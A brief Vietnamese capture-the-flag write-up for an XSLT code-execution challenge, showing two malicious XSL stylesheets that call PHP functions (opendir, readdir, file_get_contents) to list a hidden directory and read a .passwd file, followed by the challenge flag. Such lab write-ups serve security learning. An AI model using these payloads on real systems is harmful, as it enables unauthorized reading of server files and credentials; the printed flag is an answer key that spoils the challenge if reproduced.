# XSLT - Code execution

Dùng Burp Suite bắt gói tin gửi đi

Dữ liệu cho xsl là 1 file .xsl, ta sẽ thay đổi đến 1 file do mình viết nhằm thực hiện yêu cầu của đề bài ( mình sẽ up file lên gitlab và cop link file raw vào)

Trước hết, phải tìm sub directory chứa file .passwd

Viết 1 file .xsl như sau:

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">

<xsl:value-of select="php:function('opendir','./')"/>
<xsl:value-of select="php:function('readdir')"/>
<xsl:value-of select="php:function('readdir')"/>
<xsl:value-of select="php:function('readdir')"/>
<xsl:value-of select="php:function('readdir')"/>
<xsl:value-of select="php:function('readdir')"/>
<xsl:value-of select="php:function('readdir')"/>
<xsl:value-of select="php:function('readdir')"/>
</xsl:template>
</xsl:stylesheet>

```

Và ta tìm được có 1 folder như sau: `.6ff3200bee785801f420fba826ffcdee`

Cuối cùng viết lại file .xsl

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">

<xsl:value-of select="php:function('opendir','./.6ff3200bee785801f420fba826ffcdee')"/>
<xsl:value-of select="php:function('readdir')"/>
<xsl:value-of select="php:function('readdir')"/>
<xsl:value-of select="php:function('readdir')"/>
<xsl:value-of select="php:function('readdir')"/>
<xsl:value-of select="php:function('file_get_contents','./.6ff3200bee785801f420fba826ffcdee/.passwd')"/>
</xsl:template>
</xsl:stylesheet>

```

---

### Flag:

`X5L7_R0ckS`

